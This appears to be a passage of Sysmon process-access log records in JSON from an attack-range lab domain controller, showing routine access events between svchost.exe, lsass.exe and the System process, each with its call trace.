{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":893,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.318\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.318","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":894,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.318\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.318","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":895,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.334\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.334","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":896,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.334\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.334","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":897,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.334\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1056-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.334","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1056-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":898,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.334\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1056-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.334","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1056-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":899,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.334\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+1fe59|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.334","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+1fe59|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":900,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.334\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+19dd3|c:\\windows\\system32\\lsm.dll+1ff57|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.334","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+19dd3|c:\\windows\\system32\\lsm.dll+1ff57|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\S